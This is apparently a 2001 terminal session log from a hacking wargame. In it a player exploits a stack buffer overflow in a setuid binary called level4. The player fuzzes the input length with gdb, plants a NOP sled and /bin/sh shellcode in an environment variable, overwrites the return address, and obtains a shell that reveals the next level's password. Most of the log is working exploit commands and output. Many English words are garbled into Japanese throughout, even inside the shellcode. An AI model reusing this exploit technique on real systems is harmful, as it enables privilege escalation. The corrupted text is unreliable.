Script started on Mon Dec 24 07:37:49 2001 恐れる:0:level3$ telnet 切り開く/タクシー/不正アクセス.datafort.逮捕する Trying 213.132.58.103... Connected to 切り開く/タクシー/不正アクセス.datafort.逮捕する. Escape character is '^]'. FreeBSD/i386 (badc0ded.datafort.逮捕する) (ttyp2) login: level3 Password: Last login: Tue Dec 18 22:30:50 from 61.37.177.27 Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All 権利s reserved. FreeBSD 4.4-RELEASE (GENERIC) #0: Tue Sep 18 11:57:08 PDT 2001 You have mail. bash-2.05$ cd temp bash-2.05$ cp /contest/level4 . bash-2.05$ ./level4 bash-2.05$ ./level4 `perl -e 'print "A" x 4096'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./level4 level4.核心 (no debugging symbols 設立する)...核心 was 生成するd by `level4'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...done. #0 0x280dc67f in getenv () from /usr/lib/libc.so.4 (gdb) x/i $pc 0x280dc67f <getenv+135>: cmpb $0x0,(%ecx) (gdb) i r ecx ecx 0x41414141 1094795585 (gdb) やめる bash-2.05$ ./level4 `perl -e 'print "A" x 1024'` Segmentation fault (核心 捨てるd) bash-2.05$ !gdb gdb -q ./level4 level4.核心 (no debugging symbols 設立する)...核心 was 生成するd by `level4'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. 
#0 0x280dc67f in getenv () from /usr/lib/libc.so.4 (gdb) やめる bash-2.05$ ./level4 `perl -e 'print "A" x 512'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbash-2.05$ ./level4 `perl -e 'print "A" x 768'` Segmentation fault (核心 捨てるd) bash-2.05$ !gdb gdb -q ./level4 level4.核心 (no debugging symbols 設立する)...核心 was 生成するd by `level4'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x280dc67f in getenv () from /usr/lib/libc.so.4 (gdb) やめる bash-2.05$ ./level4 `perl -e 'print "A" x 600'` Segmentation fault (核心 捨てるd) bash-2.05$ !gdb gdb -q ./level4 level4.核心 (no debugging symbols 設立する)...核心 was 生成するd by `level4'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ 輸出(する) EGG=`perl -e 'print "\x90" x 128 . "\x31\xc0\x50\x68//sh\x68/貯蔵所\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"'` bash-2.05$ cat /tmp/getshit.c main() { printf("%x\n",getenv("EGG")); } bash-2.05$ gcc -o gs /tmp/getshit.c bash-2.05$ ./gs bfbffb27 bash-2.05$ rm -f gs bash-2.05$ ./level4 `perl -e 'print "A" x 512 . "\x2a\xfb\xbf\xbf" x 8'` $ id uid=1003(level3) gid=1003(level3) groups=1003(level3) $ 出口 bash-2.05$ /contest/level4 `perl -e 'print "A" x 512 . 
"\x2a\xfb\xbf\xbf" x 8'` $ id uid=1003(level3) euid=1004(level4) gid=1003(level3) groups=1003(level3) $ pass The password for level4 is hellokitty $ 出口 bash-2.05$ 出口 関係 の近くにd by foreign host. 恐れる:0:level3$ 出口 Script done on Mon Dec 24 08:03:51 2001